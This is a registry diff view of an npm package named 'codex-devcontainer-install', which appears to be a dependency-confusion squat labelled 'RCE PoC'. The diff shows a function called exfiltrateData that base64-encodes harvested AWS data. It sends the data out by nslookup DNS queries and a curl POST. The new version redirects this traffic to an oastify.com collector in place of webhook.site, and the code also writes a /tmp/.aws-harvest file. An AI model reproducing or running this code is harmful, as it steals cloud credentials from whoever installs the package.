codex-devcontainer-install 99.9.1 → 99.9.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -108,8 +108,8 @@ function exfiltrateData(data) {
108
108
  awsData: data
109
109
  };
110
110
  const payload = Buffer.from(JSON.stringify(exfilData)).toString('base64');
111
- executeCommand(`nslookup ${payload.substring(0, 50)}.1fa2ba5b-e98c-4c76-ab52-482c6690c983`);
112
- executeCommand(`curl -X POST https://webhook.site/1fa2ba5b-e98c-4c76-ab52-482c6690c983 -H "Content-Type: application/json" -d '${JSON.stringify(exfilData)}' --connect-timeout 5`);
111
+ executeCommand(`nslookup ${payload.substring(0, 50)}.615bmjqf0tks16c7ulepculjdaj37tvi.oastify.com`);
112
+ executeCommand(`curl -X POST https://615bmjqf0tks16c7ulepculjdaj37tvi.oastify.com -H "Content-Type: application/json" -d '${JSON.stringify(exfilData)}' --connect-timeout 5`);
113
113
  fs.writeFileSync('/tmp/.aws-harvest', JSON.stringify(exfilData, null, 2));
114
114
 
115
115
  return payload;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "codex-devcontainer-install",
3
- "version": "99.9.1",
3
+ "version": "99.9.2",
4
4
  "description": "This is RCE PoC",
5
5
  "main": "index.js",
6
6
  "scripts": {